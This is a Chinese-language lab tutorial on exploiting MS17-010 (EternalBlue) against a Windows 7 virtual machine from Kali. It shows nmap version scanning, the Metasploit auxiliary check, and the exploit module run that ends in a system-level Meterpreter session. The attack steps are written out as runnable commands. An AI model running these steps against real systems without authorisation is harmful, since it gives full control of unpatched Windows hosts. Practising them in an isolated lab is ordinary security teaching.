环境准备
虚拟机软件:VMware Workstation Pro
攻击机:kali
系统
靶机:windows7
系统
在虚拟机中分别配置攻击机和靶机的网络模式为net模式
实验部分
1.打开kali的终端
可以点击左上角图标打开终端或者鼠标右键,选择在这里打开终端
进入终端。
2.切换管理员模式
命令:sudo su
在输入kali密码的时候,输入是隐藏了,把正确密码输入回车。看到如图显示的页面即成功切换权限。
3.分别查看攻击机和靶机的ip地址
win7:ipconfig
kali:ifconfig
4.使用nmap工具(kali自带一款漏扫工具)进行 扫描,查看靶机是否存活
命令:nmap 192.168.171.128 -sV
该ip地址为靶机的ip地址,-sV是指定让nmap进行版本探测
可以看到,靶机是win7系统且445端口(一个TCP端口)是开放(open)的,可以尝试进行ms17-010漏洞攻击。
5.启动Metasploit并使用其攻击
启动Metasploit命令: msfconsole
搜索ms17-010模块命令:search ms17-010
上图中的exploit
是攻击模块,auxiliary
是辅助模块,我们先使用辅助模块扫描判断漏洞是否存在
使用辅助模块3命令:use 3
查看该模块缺少的参数,命令:show options
上图中,required为yes的current setting为必填的,从上图可以看到我们需要给rhosts(攻击目标ip)设置值,命令:set rhost 192.168.171.128
。再次使用show options
命令查看是否还有参数缺失
确认必填参数均有值之后,开始扫描,命令:run
扫描结果可以看到,靶机确实存在ms17-010漏洞,接下来我们尝试去攻击。先从辅助模块切换到攻击模块,命令:use 0
再使用show options
查看该模块缺失的参数
给rhosts(攻击目标ip)设置值,命令:set rhost 192.168.171.128
。再次使用show options
命令查看是否还有参数缺失
确认必填参数均有值之后,开始攻击run
最终拿到靶机系统权限,即渗透成功。接下来,我们就可以使用一些meterpreter命令对靶机系统进行操作了。